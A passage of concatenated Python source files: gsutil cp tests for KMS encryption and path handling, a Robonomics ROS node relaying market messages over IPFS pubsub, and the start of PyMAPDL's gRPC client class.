testcase.KmsTestingResources.KEYRING_NAME,
location=testcase.KmsTestingResources.KEYRING_LOCATION)
key_fqn = self.kms_api.CreateCryptoKey(keyring_fqn, key_name)
# Make sure that the service account for our default project is authorized
# to use our test KMS key.
self.RunGsUtil(['kms', 'authorize', '-k', key_fqn], force_gsutil=True)
return key_fqn
@SkipForS3('Test uses gs-specific KMS encryption')
def test_kms_key_correctly_applied_to_dst_obj_from_src_with_no_key(self):
bucket_uri = self.CreateBucket()
obj1_name = 'foo'
obj2_name = 'bar'
key_fqn = self.authorize_project_to_use_testing_kms_key()
# Create the unencrypted object, then copy it, specifying a KMS key for the
# new object.
obj_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name=obj1_name,
contents=b'foo')
with SetBotoConfigForTest([('GSUtil', 'encryption_key', key_fqn)]):
self.RunGsUtil(
['cp', suri(obj_uri),
'%s/%s' % (suri(bucket_uri), obj2_name)])
# Make sure the new object is encrypted with the specified KMS key.
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
self.AssertObjectUsesCMEK('%s/%s' % (suri(bucket_uri), obj2_name),
key_fqn)
@SkipForS3('Test uses gs-specific KMS encryption')
def test_kms_key_correctly_applied_to_dst_obj_from_local_file(self):
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'abcd')
obj_name = 'foo'
obj_suri = suri(bucket_uri) + '/' + obj_name
key_fqn = self.authorize_project_to_use_testing_kms_key()
with SetBotoConfigForTest([('GSUtil', 'encryption_key', key_fqn)]):
self.RunGsUtil(['cp', fpath, obj_suri])
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
self.AssertObjectUsesCMEK(obj_suri, key_fqn)
@SkipForS3('Test uses gs-specific KMS encryption')
def test_kms_key_works_with_resumable_upload(self):
resumable_threshold = 1024 * 1024 # 1M
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'a' * resumable_threshold)
obj_name = 'foo'
obj_suri = suri(bucket_uri) + '/' + obj_name
key_fqn = self.authorize_project_to_use_testing_kms_key()
with SetBotoConfigForTest([('GSUtil', 'encryption_key', key_fqn),
('GSUtil', 'resumable_threshold',
str(resumable_threshold))]):
self.RunGsUtil(['cp', fpath, obj_suri])
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
self.AssertObjectUsesCMEK(obj_suri, key_fqn)
@SkipForS3('Test uses gs-specific KMS encryption')
def test_kms_key_correctly_applied_to_dst_obj_from_src_with_diff_key(self):
bucket_uri = self.CreateBucket()
obj1_name = 'foo'
obj2_name = 'bar'
key1_fqn = self.authorize_project_to_use_testing_kms_key()
key2_fqn = self.authorize_project_to_use_testing_kms_key(
key_name=testcase.KmsTestingResources.CONSTANT_KEY_NAME2)
obj1_suri = suri(
self.CreateObject(bucket_uri=bucket_uri,
object_name=obj1_name,
contents=b'foo',
kms_key_name=key1_fqn))
# Copy the object to the same bucket, specifying a different key to be used.
obj2_suri = '%s/%s' % (suri(bucket_uri), obj2_name)
with SetBotoConfigForTest([('GSUtil', 'encryption_key', key2_fqn)]):
self.RunGsUtil(['cp', obj1_suri, obj2_suri])
# Ensure the new object has the different key.
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
self.AssertObjectUsesCMEK(obj2_suri, key2_fqn)
@SkipForS3('Test uses gs-specific KMS encryption')
@SkipForXML('Copying KMS-encrypted objects prohibited with XML API')
def test_kms_key_not_applied_to_nonkms_dst_obj_from_src_with_kms_key(self):
bucket_uri = self.CreateBucket()
obj1_name = 'foo'
obj2_name = 'bar'
key1_fqn = self.authorize_project_to_use_testing_kms_key()
obj1_suri = suri(
self.CreateObject(bucket_uri=bucket_uri,
object_name=obj1_name,
contents=b'foo',
kms_key_name=key1_fqn))
# Copy the object to the same bucket, not specifying any KMS key.
obj2_suri = '%s/%s' % (suri(bucket_uri), obj2_name)
self.RunGsUtil(['cp', obj1_suri, obj2_suri])
# Ensure the new object has no KMS key.
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
self.AssertObjectUnencrypted(obj2_suri)
@unittest.skipUnless(
IS_WINDOWS,
'Only Windows paths need to be normalized to use backslashes instead of '
'forward slashes.')
def test_windows_path_with_back_and_forward_slash_is_normalized(self):
# Prior to this test and its corresponding fix, running
# `gsutil cp dir/./file gs://bucket` would result in an object whose name
# was "dir/./file", rather than just "file", as Windows tried to split on
# the path component separator "\" intead of "/".
tmp_dir = self.CreateTempDir()
self.CreateTempFile(tmpdir=tmp_dir, file_name='obj1', contents=b'foo')
bucket_uri = self.CreateBucket()
self.RunGsUtil(['cp', '%s\\./obj1' % tmp_dir, suri(bucket_uri)])
# If the destination path was not created correctly, this stat call should
# fail with a non-zero exit code because the specified object won't exist.
self.RunGsUtil(['stat', '%s/obj1' % suri(bucket_uri)])
def test_cp_minus_m_streaming_upload(self):
"""Tests that cp -m - anything is disallowed."""
stderr = self.RunGsUtil(['-m', 'cp', '-', 'file'],
return_stderr=True,
expected_status=1)
self.assertIn(
'CommandException: Cannot upload from a stream when using gsutil -m',
stderr)
@SequentialAndParallelTransfer
def test_cp_overwrites_existing_destination(self):
key_uri = self.CreateObject(contents=b'foo')
fpath = self.CreateTempFile(contents=b'bar')
stderr = self.RunGsUtil(['cp', suri(key_uri), fpath], return_stderr=True)
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'foo')
@SequentialAndParallelTransfer
def test_downloads_are_reliable_with_more_than_one_gsutil_instance(self):
test_file_count = 10
temporary_directory = self.CreateTempDir()
bucket_uri = self.CreateBucket(test_objects=test_file_count)
cp_args = ['cp', suri(bucket_uri, '*'), temporary_directory]
threads = []
for _ in range(2):
thread = threading.Thread(target=self.RunGsUtil, args=[cp_args])
thread.start()
threads.append(thread)
[t.join() for t in threads]
self.assertEqual(len(os.listdir(temporary_directory)), test_file_count)
class TestCpUnitTests(testcase.GsUtilUnitTestCase):
"""Unit tests for gsutil cp."""
def testDownloadWithNoHashAvailable(self):
"""Tests a download with no valid server-supplied hash."""
# S3 should have a special message for non-MD5 etags.
bucket_uri = self.CreateBucket(provider='s3')
object_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'foo')
object_uri.get_key().etag = '12345' # Not an MD5
dst_dir = self.CreateTempDir()
log_handler = self.RunCommand('cp', [suri(object_uri), dst_dir],
return_log_handler=True)
warning_messages = log_handler.messages['warning']
self.assertEquals(2, len(warning_messages))
self.assertRegex(
warning_messages[0], r'Non-MD5 etag \(12345\) present for key .*, '
r'data integrity checks are not possible')
self.assertIn('Integrity cannot be assured', warning_messages[1])
def testDownloadWithDestinationEndingWithDelimiterRaisesError(self):
"""Tests a download with no valid server-supplied hash."""
# S3 should have a special message for non-MD5 etags.
bucket_uri = self.CreateBucket(provider='s3')
object_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'foo')
destination_path = 'random_dir' + os.path.sep
with self.assertRaises(InvalidUrlError) as error:
self.RunCommand('cp', [suri(object_uri), destination_path])
self.assertEqual(str(error), 'Invalid destination path: random_dir/')
def test_object_and_prefix_same_name(self):
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'foo')
self.CreateObject(bucket_uri=bucket_uri,
object_name='foo/bar',
contents=b'bar')
fpath = self.CreateTempFile()
# MockKey doesn't support hash_algs, so the MD5 will not match.
with SetBotoConfigForTest([('GSUtil', 'check_hashes', 'never')]):
self.RunCommand('cp', [suri(object_uri), fpath])
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'foo')
def test_cp_upload_respects_no_hashes(self):
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'abcd')
with SetBotoConfigForTest([('GSUtil', 'check_hashes', 'never')]):
log_handler = self.RunCommand('cp', [fpath, suri(bucket_uri)],
return_log_handler=True)
warning_messages = log_handler.messages['warning']
self.assertEquals(1, len(warning_messages))
self.assertIn('Found no hashes to validate object upload',
warning_messages[0])
def test_shim_translates_flags(self):
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'abcd')
with SetBotoConfigForTest([('GSUtil', 'use_gcloud_storage', 'True'),
('GSUtil', 'hidden_shim_mode', 'dry_run')]):
with SetEnvironmentForTest({
'CLOUDSDK_CORE_PASS_CREDENTIALS_TO_GSUTIL': 'True',
'CLOUDSDK_ROOT_DIR': 'fake_dir',
}):
mock_log_handler = self.RunCommand(
'cp',
['-r', '-R', '-e', fpath, suri(bucket_uri)],
return_log_handler=True)
info_lines = '\n'.join(mock_log_handler.messages['info'])
self.assertIn(
'Gcloud Storage Command: {} alpha storage cp'
' -r -r --ignore-symlinks {} {}'.format(
os.path.join('fake_dir', 'bin', 'gcloud'), fpath,
suri(bucket_uri)), info_lines)
@unittest.skipIf(IS_WINDOWS, 'POSIX attributes not available on Windows.')
@mock.patch('os.geteuid', new=mock.Mock(return_value=0))
@mock.patch.object(os, 'chown', autospec=True)
def test_posix_runs_chown_as_super_user(self, mock_chown):
fpath = self.CreateTempFile(contents=b'abcd')
obj = apitools_messages.Object()
obj.metadata = CreateCustomMetadata(entries={UID_ATTR: USER_ID})
ParseAndSetPOSIXAttributes(fpath, obj, False, True)
mock_chown.assert_called_once_with(fpath, USER_ID, -1)
@unittest.skipIf(IS_WINDOWS, 'POSIX attributes not available on Windows.')
@mock.patch('os.geteuid', new=mock.Mock(return_value=1))
@mock.patch.object(os, 'chown', autospec=True)
def test_posix_skips_chown_when_not_super_user(self, mock_chown):
fpath = self.CreateTempFile(contents=b'abcd')
obj = apitools_messages.Object()
obj.metadata = CreateCustomMetadata(entries={UID_ATTR: USER_ID})
ParseAndSetPOSIXAttributes(fpath, obj, False, True)
mock_chown.assert_not_called()
|
infochan.py
|
# -*- coding: utf-8 -*-
#
# Robonomics information channels support node.
#
from robonomics_lighthouse.msg import Ask, Bid, Result
from binascii import hexlify, unhexlify
from .pubsub import publish, subscribe
from urllib.parse import urlparse
from threading import Thread
import rospy
def bid2dict(b):
return { 'model' : b.model,
'token' : b.token,
'cost' : b.cost,
'count' : b.count,
'lighthouseFee' : b.lighthouseFee,
'salt' : hexlify(b.salt).decode('utf-8'),
'signature': hexlify(b.signature).decode('utf-8'),
'deadline' : b.deadline }
def ask2dict(a):
return { 'model' : a.model,
'objective': a.objective,
'token' : a.token,
'cost' : a.cost,
'count' : a.count,
'validator' : a.validator,
'validatorFee' : a.validatorFee,
'salt' : hexlify(a.salt).decode('utf-8'),
'signature': hexlify(a.signature).decode('utf-8'),
'deadline' : a.deadline }
def res2dict(r):
return { 'liability' : r.liability,
'result' : r.result,
'signature' : hexlify(r.signature).decode('utf-8') }
class InfoChan:
def __init__(self):
'''
Robonomics information channel initialisation.
'''
rospy.init_node('robonomics_infochan')
self.lighthouse = rospy.get_param('~lighthouse_contract')
ipfs_api = urlparse(rospy.get_param('~ipfs_http_provider')).netloc.split(':')
self.ipfs_api = '/ip4/{0}/tcp/{1}'.format(ipfs_api[0], ipfs_api[1])
self.incoming_bid = rospy.Publisher('incoming/bid', Bid, queue_size=10)
self.incoming_ask = rospy.Publisher('incoming/ask', Ask, queue_size=10)
self.incoming_res = rospy.Publisher('incoming/result', Result, queue_size=10)
self.market_chan = '{0}_market'.format(self.lighthouse)
self.result_chan = '{0}_result'.format(self.lighthouse)
rospy.Subscriber('sending/bid', Bid, lambda m: publish(self.ipfs_api, self.market_chan, bid2dict(m)))
rospy.Subscriber('sending/ask', Ask, lambda m: publish(self.ipfs_api, self.market_chan, ask2dict(m)))
rospy.Subscriber('sending/result', Result, lambda m: publish(self.ipfs_api, self.result_chan, res2dict(m)))
def spin(self):
'''
Waiting for the new messages.
'''
def market_thread():
for m in subscribe(self.ipfs_api, self.market_chan):
if 'objective' in m:
msg = Ask()
msg.model = m['model']
msg.objective = m['objective']
msg.token = m['token']
msg.cost = m['cost']
msg.count = m['count']
msg.validator = m['validator']
msg.validatorFee = m['validatorFee']
msg.salt = unhexlify(m['salt'].encode('utf-8'))
msg.signature = unhexlify(m['signature'].encode('utf-8'))
msg.deadline = m['deadline']
self.incoming_ask.publish(msg)
else:
msg = Bid()
msg.model = m['model']
msg.token = m['token']
msg.cost = m['cost']
msg.count = m['count']
msg.lighthouseFee = m['lighthouseFee']
msg.salt = unhexlify(m['salt'].encode('utf-8'))
msg.signature = unhexlify(m['signature'].encode('utf-8'))
msg.deadline = m['deadline']
self.incoming_bid.publish(msg)
def result_thread():
for m in subscribe(self.ipfs_api, self.result_chan):
msg = Result()
msg.liability = m['liability']
msg.result = m['result']
msg.signature = unhexlify(m['signature'].encode('utf-8'))
self.incoming_res.publish(msg)
Thread(target=market_thread, daemon=True).start()
Thread(target=result_thread, daemon=True).start()
rospy.spin()
|
mapdl_grpc.py
|
"""gRPC specific class and methods for the MAPDL gRPC client """
import re
from warnings import warn
import shutil
import threading
import weakref
import io
import time
import os
import socket
from functools import wraps
import tempfile
import subprocess
import grpc
import numpy as np
from tqdm import tqdm
from grpc._channel import _InactiveRpcError, _MultiThreadedRendezvous
MSG_IMPORT = """There was a problem importing the ANSYS API module (ansys.api.mapdl).
Please make sure you have the latest updated version using:
'pip install ansys-api-mapdl-v0' or 'pip install --upgrade ansys-api-mapdl-v0'
If this does not solve it, please reinstall 'ansys.mapdl.core'
or contact Technical Support at 'https://github.com/pyansys/pymapdl'."""
MSG_MODULE = """ANSYS API module (ansys.api.mapdl) could not be found.
This might be due to a faulty installation or obsolete API module version.
Please make sure you have the latest updated version using:
'pip install ansys-api-mapdl-v0' or 'pip install --upgrade ansys-api-mapdl-v0'
If this does not solve it, please reinstall 'ansys.mapdl.core'.
or contact Technical Support at 'https://github.com/pyansys/pymapdl'."""
try:
from ansys.api.mapdl.v0 import mapdl_pb2 as pb_types
from ansys.api.mapdl.v0 import mapdl_pb2_grpc as mapdl_grpc
from ansys.api.mapdl.v0 import ansys_kernel_pb2 as anskernel
except ImportError:
raise ImportError(MSG_IMPORT)
except ModuleNotFoundError:
raise ImportError(MSG_MODULE)
from ansys.mapdl.core.mapdl import _MapdlCore
from ansys.mapdl.core.errors import MapdlExitedError, protect_grpc, MapdlRuntimeError
from ansys.mapdl.core.misc import (
supress_logging,
run_as_prep7,
last_created,
random_string,
)
from ansys.mapdl.core.post import PostProcessing
from ansys.mapdl.core.common_grpc import (
parse_chunks,
ANSYS_VALUE_TYPE,
DEFAULT_CHUNKSIZE,
DEFAULT_FILE_CHUNK_SIZE,
)
from ansys.mapdl.core import __version__, _LOCAL_PORTS
from ansys.mapdl.core import check_version
TMP_VAR = '__tmpvar__'
VOID_REQUEST = anskernel.EmptyRequest()
# Default 256 MB message length
MAX_MESSAGE_LENGTH = int(os.environ.get("PYMAPDL_MAX_MESSAGE_LENGTH", 256 * 1024 ** 2))
def chunk_raw(raw, save_as):
with io.BytesIO(raw) as f:
while True:
piece = f.read(DEFAULT_FILE_CHUNK_SIZE)
length = len(piece)
if length == 0:
return
yield pb_types.UploadFileRequest(
file_name=os.path.basename(save_as),
chunk=anskernel.Chunk(payload=piece, size=length),
)
def get_file_chunks(filename, progress_bar=False):
"""Serializes a file into chunks"""
pbar = None
if progress_bar:
n_bytes = os.path.getsize(filename)
base_name = os.path.basename(filename)
pbar = tqdm(
total=n_bytes,
desc="Uploading %s" % base_name,
unit="B",
unit_scale=True,
unit_divisor=1024,
)
with open(filename, "rb") as f:
while True:
piece = f.read(DEFAULT_FILE_CHUNK_SIZE)
length = len(piece)
if length == 0:
if pbar is not None:
pbar.close()
return
if pbar is not None:
pbar.update(length)
chunk = anskernel.Chunk(payload=piece, size=length)
yield pb_types.UploadFileRequest(
file_name=os.path.basename(filename), chunk=chunk
)
def save_chunks_to_file(
chunks, filename, progress_bar=True, file_size=None, target_name=""
):
"""Saves chunks to a local file
Returns
-------
file_size : int
File size saved in bytes. ``0`` means no file was written.
"""
pbar = None
if progress_bar:
pbar = tqdm(
total=file_size,
desc="Downloading %s" % target_name,
unit="B",
unit_scale=True,
unit_divisor=1024,
)
file_size = 0
with open(filename, "wb") as f:
for chunk in chunks:
f.write(chunk.payload)
payload_size = len(chunk.payload)
file_size += payload_size
if pbar is not None:
pbar.update(payload_size)
if pbar is not None:
pbar.close()
return file_size
class RepeatingTimer(threading.Timer):
"""Run a function repeately"""
def run(self):
while not self.finished.is_set():
self.function(*self.args, **self.kwargs)
self.finished.wait(self.interval)
def check_valid_ip(ip):
"""Check for valid IP address"""
if ip != "localhost":
ip = ip.replace('"', "").replace("'", "")
socket.inet_aton(ip)
class MapdlGrpc(_MapdlCore):
"""This class connects to a GRPC MAPDL server and allows commands
to be passed to a persistent session.
Parameters
----------
ip : str, optional
IP address to connect to the server. Defaults to 'localhost'.
port : int, optional
Port to connect to the mapdl server. Defaults to 50052.
timeout : float
Maximum allowable time to connect to the MAPDL server.
loglevel : str, optional
Sets which messages are printed to the console. Default
'INFO' prints out all ANSYS messages, 'WARNING` prints only
messages containing ANSYS warnings, and 'ERROR' prints only
error messages.
cleanup_on_exit : bool, optional
Exit MAPDL when Python exits or when this instance is garbage
collected.
set_no_abort : bool, optional
Sets MAPDL to not abort at the first error within /BATCH mode.
Default ``True``.
remove_temp_files : bool, optional
Removes temporary files on exit if MAPDL is local. Default
``False``.
log_file : bool, optional
Copy the log to a file called `logs.log` located where the
python script is executed. Default ``True``.
Examples
--------
Connect to an instance of MAPDL already running on locally on the
default port 50052.
>>> from ansys.mapdl import core as pymapdl
>>> mapdl = pymapdl.Mapdl()
Connect to an instance of MAPDL running on the LAN on a default port
>>> mapdl = pymapdl.Mapdl('192.168.1.101')
Connect to an instance of MAPDL running on the LAN on a non-default port
>>> mapdl = pymapdl.Mapdl('192.168.1.101', port=60001)
"""
# Required by `_name` method to be defined before __init__ be
_ip = None
_port = None
def __init__(self, ip='127.0.0.1', port=None, timeout=15, loglevel='WARNING',
log_file=False, cleanup_on_exit=False, log_apdl=None,
set_no_abort=True, remove_temp_files=False, **kwargs):
"""Initialize connection to the mapdl server"""
self.__distributed = None
# port and ip are needed to setup the log
self._port = port
self._ip = ip
super().__init__(
loglevel=loglevel, log_apdl=log_apdl, log_file=log_file, **kwargs
)
check_valid_ip(ip)
# gRPC request specific locks as these gRPC request are not thread safe
self._vget_lock = False
self._get_lock = False
self._prioritize_thermal = False
self._locked = False # being used within MapdlPool
self._stub = None
self._cleanup = cleanup_on_exit
self._remove_tmp = remove_temp_files
self._jobname = kwargs.pop("jobname", "file")
self._path = kwargs.pop("run_location", None)
self._busy = False # used to check if running a command on the server
self._channel_str = None
self._local = ip in ["127.0.0.1", "127.0.1.1", "localhost"]
if "local" in kwargs: # allow this to be overridden
self._local = kwargs["local"]
self._health_response_queue = None
self._exiting = False
self._exited = None
self._mute = False
if port is None:
from ansys.mapdl.core.launcher import MAPDL_DEFAULT_PORT
port = MAPDL_DEFAULT_PORT
self._server = None
self._channel = None
self._state = None
self._stub = None
self._timeout = timeout
self._pids = []
# try to connect over a series of attempts rather than one
# single one. This prevents a single failed connection from
# blocking other attempts
n_attempts = 5 # consider adding this as a kwarg
connected = False
attempt_timeout = timeout / n_attempts
max_time = time.time() + timeout
i = 0
while time.time() < max_time and i <= n_attempts:
self._log.debug("Connection attempt %d", i + 1)
connected = self._connect(
port, timeout=attempt_timeout, set_no_abort=set_no_abort
)
i += 1
if connected:
self._log.debug("Connected")
break
else:
self._log.debug(f'Reached either maximum amount of connection attempts ({n_attempts}) or timeout ({timeout} s).')
if not connected:
raise IOError(
"Unable to connect to MAPDL gRPC instance at %s" % self._channel_str
)
# double check we have access to the local path if not
# explicitly specified
if "local" not in kwargs:
self._verify_local()
# only cache process IDs if launched locally
if self._local and "exec_file" in kwargs:
self._cache_pids()
def _verify_local(self):
"""Check if Python is local to the MAPDL instance."""
# Verify if python has assess to the MAPDL directory.
if self._local:
if self._path is None:
directory = self.directory
else:
directory = self._path
if self._jobname is None:
jobname = self.jobname
else:
jobname = self._jobname
lockfile = os.path.join(directory, jobname + ".err")
lockfile0 = os.path.join(directory, jobname + "0.err")
if os.path.isfile(lockfile):
return
if os.path.isfile(lockfile0):
return
self._local = False
@property
def mute(self):
"""Silence the response from all MAPDL functions unless
explicitly set to ``True``.
Returns
-------
bool
Current state of the mute.
Examples
--------
>>> mapdl.mute = True
>>> mapdl.prep7()
''
Temporarily override the instance setting this with
``mute=False``. This is useful for methods that parse the
MAPDL output like ``k``.
>>> mapdl.k('', 1, 1, 1, mute=False)
1
"""
return self._mute
@mute.setter
def mute(self, value):
self._mute = value
def __repr__(self):
info = super().__repr__()
return info
def _connect(self, port, timeout=5, set_no_abort=True, enable_health_check=False):
"""Establish a gRPC channel to a remote or local MAPDL instance.
Parameters
----------
timeout : float
Time in seconds to wait until the connection has been established
"""
self._server = {"ip": self._ip, "port": port}
# open the channel
self._channel_str = "%s:%d" % (self._ip, port)
self._log.debug("Opening insecure channel at %s", self._channel_str)
self._channel = grpc.insecure_channel(
self._channel_str,
options=[
("grpc.max_receive_message_length", MAX_MESSAGE_LENGTH),
],
)
self._state = grpc.channel_ready_future(self._channel)
self._stub = mapdl_grpc.MapdlServiceStub(self._channel)
# verify connection
tstart = time.time()
while ((time.time() - tstart) < timeout) and not self._state._matured:
time.sleep(0.01)
if not self._state._matured: # pragma: no cover
return False
self._log.debug("Established connection to MAPDL gRPC")
# keeps mapdl session alive
self._timer = None
if not self._local:
self._initialised = threading.Event()
self._t_trigger = time.time()
self._t_delay = 30
self._timer = threading.Thread(
target=MapdlGrpc._threaded_heartbeat, args=(weakref.proxy(self),)
)
self._timer.daemon = True
self._timer.start()
# initialize mesh, post processing, and file explorer interfaces
from ansys.mapdl.core.mesh_grpc import MeshGrpc
from ansys.mapdl.core.xpl import ansXpl
self._mesh_rep = MeshGrpc(self)
self._post = PostProcessing(self)
self._xpl = ansXpl(self)
# enable health check
if enable_health_check:
self._enable_health_check()
self.__server_version = None
# HOUSEKEEPING:
# Set to not abort after encountering errors. Otherwise, many
# failures in a row will cause MAPDL to exit without returning
# anything useful. Also avoids abort in batch mode if set.
if set_no_abort:
self._set_no_abort()
return True
@property
def _server_version(self):
"""Return the server version.
Examples
--------
>>> mapdl._server_version
(0, 3, 0)
Uses cached ``__server_version`` to avoid unnecessary communication.
"""
# check cache
if self.__server_version is None:
self.__server_version = self._get_server_version()
return self.__server_version
def _get_server_version(self):
"""Request version from gRPC server.
Generally tied to the release version unless on a development release.
2020R2 --> 0.0.0 (or any unknown version)
2021R1 --> 0.3.0
2021R2 --> 0.4.0
2022R1 --> 0.X.X
"""
sver = (0, 0, 0)
verstr = self._ctrl("VERSION")
if verstr:
sver = check_version.version_tuple(verstr)
return sver
def _enable_health_check(self):
"""Places the status of the health check in _health_response_queue"""
# lazy imports here to speed up module load
from grpc_health.v1 import health_pb2, health_pb2_grpc
def _consume_responses(response_iterator, response_queue):
try:
for response in response_iterator:
response_queue.put(response)
# NOTE: we're doing absolutely nothing with this as
# this point since the server side health check
# doesn't change state.
except Exception as err:
if self._exiting:
return
self._exited = True
raise MapdlExitedError("Lost connection with MAPDL server") from None
# enable health check
from queue import Queue
request = health_pb2.HealthCheckRequest()
self._health_stub = health_pb2_grpc.HealthStub(self._channel)
rendezvous = self._health_stub.Watch(request)
# health check feature implemented after 2020R2
try:
status = rendezvous.next()
except Exception as err:
if err.code().name != "UNIMPLEMENTED":
raise err
return
if status.status != health_pb2.HealthCheckResponse.SERVING:
raise MapdlRuntimeError(
"Unable to enable health check and/or connect to" " the MAPDL server"
)
self._health_response_queue = Queue()
# allow main process to exit by setting daemon to true
thread = threading.Thread(
target=_consume_responses,
args=(rendezvous, self._health_response_queue),
daemon=True,
)
thread.start()
def _launch(self, start_parm, timeout=10):
"""Launch a local session of MAPDL in gRPC mode.
This should only need to be used for legacy ``open_gui``
"""
if not self._local:
raise RuntimeError(
"Can only launch the GUI with a local instance of " "MAPDL"
)
from ansys.mapdl.core.launcher import launch_grpc
self._exited = False # reset exit state
port, directory = launch_grpc(**start_parm)
self._connect(port)
# may need to wait for viable connection in open_gui case
tmax = time.time() + timeout
success = False
while time.time() < tmax:
try:
self.prep7()
success = True
break
except:
pass
if not success:
raise RuntimeError("Unable to reconnect to MAPDL")
@property
def post_processing(self):
"""Post-process in an active MAPDL session.
Examples
--------
Get the nodal displacement in the X direction for the first
result set.
>>> mapdl.set(1, 1)
>>> disp_x = mapdl.post_processing.nodal_displacement('X')
array([1.07512979e-04, 8.59137773e-05, 5.70690047e-05, ...,
5.70333124e-05, 8.58600402e-05, 1.07445726e-04])
"""
return self._post
@supress_logging
def _set_no_abort(self):
"""Do not abort MAPDL"""
self.nerr(abort=-1, mute=True)
def _reset_cache(self):
"""Reset cached items"""
self._mesh_rep._reset_cache()
self._geometry._reset_cache()
@property
def _mesh(self):
return self._mesh_rep
def _run(self, cmd, verbose=False, mute=None):
"""Sens a command and return the response as a string.
Parameters
----------
cmd : str
Valid MAPDL command.
verbose : bool, optional
Print the response of a command while it is being run.
mute : bool, optional
Request that no output be sent from the gRPC server.
Defaults to the global setting as specified with
``mapdl.mute = <bool>``. Default ``False``
Examples
--------
Run a basic command.
>>> mapdl.run('/PREP7')
Run a command and suppress its output.
>>> mapdl.run('/PREP7', mute=True)
Run a command and stream its output while it is being run.
>>> mapdl.run('/PREP7', verbose=True)
"""
if mute is None:
mute = self._mute
if self._exited:
raise MapdlExitedError
# don't allow empty commands
if not cmd.strip():
raise ValueError("Empty commands not allowed")
if len(cmd) > 639: # CMD_MAX_LENGTH
raise ValueError("Maximum command length must be less than 640 characters")
self._busy = True
if verbose:
response = self._send_command_stream(cmd, True)
else:
response = self._send_command(cmd, mute=mute)
self._busy = False
return response.strip()
@property
def busy(self):
"""True when MAPDL gRPC server is executing a command"""
return self._busy
@protect_grpc
def _send_command(self, cmd, mute=False):
"""Send a MAPDL command and return the response as a string"""
opt = ""
if mute:
opt = "MUTE" # suppress any output
request = pb_types.CmdRequest(command=cmd, opt=opt)
# TODO: Capture keyboard exception and place this in a thread
grpc_response = self._stub.SendCommand(request)
resp = grpc_response.response
if resp is not None:
return resp.strip()
return None
@protect_grpc
def _send_command_stream(self, cmd, verbose=False):
"""Send a command and expect a streaming response"""
request = pb_types.CmdRequest(command=cmd)
metadata = [("time_step_stream", "100")]
stream = self._stub.SendCommandS(request, metadata=metadata)
response = []
for item in stream:
cmdout = "\n".join(item.cmdout)
if verbose:
print(cmdout)
response.append(cmdout.strip())
return "".join(response)
def _threaded_heartbeat(self):
"""To be called from a thread to verify mapdl instance is alive"""
self._initialised.set()
while True:
if self._exited:
break
try:
time.sleep(self._t_delay)
if not self.is_alive:
break
except ReferenceError:
break
except Exception:
continue
def exit(self, save=False):
"""Exit MAPDL.
Parameters
----------
save : bool, optional
Save the database on exit. Default ``False``.
Examples
--------
>>> mapdl.exit()
"""
if self._exited:
return
self._exiting = True
self._log.debug("Exiting MAPDL")
if save:
try:
self.save()
except:
pass
self._kill() # sets self._exited = True
self._close_process()
self._remove_lock_file()
if self._remove_tmp and self._local:
self._log.debug("Removing local temporary files")
shutil.rmtree(self.directory, ignore_errors=True)
if self._local and self._port in _LOCAL_PORTS:
_LOCAL_PORTS.remove(self._port)
def _kill(self):
"""Call exit(0) on the server."""
self._ctrl("EXIT")
self._exited = True
def _close_process(self):
"""Close all MAPDL processes"""
if self._local:
for pid in self._pids:
try:
os.kill(pid, 9)
except OSError:
pass
def _cache_pids(self):
"""Store the process IDs used when launching MAPDL"""
for filename in self.list_files():
if "cleanup" in filename:
script = os.path.join(self.directory, filename)
with open(script) as f:
raw = f.read()
if os.name == "nt":
pids = re.findall(r"/pid (\d+)", raw)
else:
pids = set(re.findall(r"-9 (\d+)", raw))
self._pids = [int(pid) for pid in pids]
def _remove_lock_file(self):
"""Removes the lock file.
Necessary to call this as a segfault of MAPDL or sys(0) will
not remove the lock file.
"""
mapdl_path = self.directory
if mapdl_path:
for lockname in [self.jobname + ".lock", "file.lock"]:
lock_file = os.path.join(mapdl_path, lockname)
if os.path.isfile(lock_file):
try:
os.remove(lock_file)
except OSError:
pass
def _run_cleanup_script(self): # pragma: no cover
"""Run the APDL cleanup script.
On distributed runs MAPDL creates a cleanup script to kill the
processes created by the ANSYS spawner. Normally this file is
removed when APDL exits normally, but on a failure, it's
necessary to manually close these PIDs.
"""
# run cleanup script when local
if self._local:
for filename in self.list_files():
if "cleanup" in filename:
script = os.path.join(self.directory, filename)
if not os.path.isfile(script):
return
if os.name != "nt":
script = ["/bin/bash", script]
process = subprocess.Popen(
script,
shell=False,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
# always communicate to allow process to run
output, err = process.communicate()
self._log.debug(
"Cleanup output:\n\n%s\n%s", output.decode(), err.decode()
)
def list_files(self, refresh_cache=True):
"""List the files in the working directory of MAPDL.
Parameters
----------
refresh_cache : bool, optional
If local, refresh local cache by querying MAPDL for its
current path.
Returns
-------
list
List of files in the working directory of MAPDL.
Examples
--------
>>> files = mapdl.list_files()
>>> for file in files: print(file)
file.lock
file0.bat
file0.err
file0.log
file0.page
file1.err
file1.log
file1.out
file1.page
"""
if self._local: # simply return a python list of files
if refresh_cache:
local_path = self.directory
else:
local_path = self._directory
if local_path:
if os.path.isdir(local_path):
return os.listdir(local_path)
return []
elif self._exited:
raise RuntimeError("Cannot list remote files since MAPDL has exited")
# this will sometimes return 'LINUX x6', 'LIN', or 'L'
if "L" in self.parameters.platform[:1]:
cmd = "ls"
else:
cmd = "dir /b /a"
files = self.sys(cmd).splitlines()
if not files:
warn("No files listed")
return files
@supress_logging
def sys(self, cmd):
"""Pass a command string to the operating system.
APDL Command: /SYS
Passes a command string to the operating system for execution
(see the Operations Guide). Typical strings are system
commands such as list, copy, rename, etc. Control returns to
